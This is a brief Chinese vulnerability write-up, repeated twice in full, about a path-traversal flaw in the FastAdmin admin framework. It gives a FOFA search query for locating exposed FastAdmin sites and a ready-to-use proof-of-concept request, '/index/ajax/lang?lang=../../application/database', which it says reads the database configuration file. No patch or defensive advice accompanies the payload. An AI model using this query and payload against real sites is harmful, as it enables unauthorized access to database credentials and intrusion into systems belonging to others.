漏洞描述
FastAdmin是一个基于ThinkPHP5和Bootstrap的后台开发框架,支持权限管理、响应式开发、多语言、模块化开发、CRUD和自由可扩展等功能。
漏洞复现
FOFA
body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"
POC
IP+/index/ajax/lang?lang=../../application/database
成功读取数据库文件
FastAdmin是一个基于ThinkPHP5和Bootstrap的后台开发框架,支持权限管理、响应式开发、多语言、模块化开发、CRUD和自由可扩展等功能。
FOFA
body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"
POC
IP+/index/ajax/lang?lang=../../application/database
成功读取数据库文件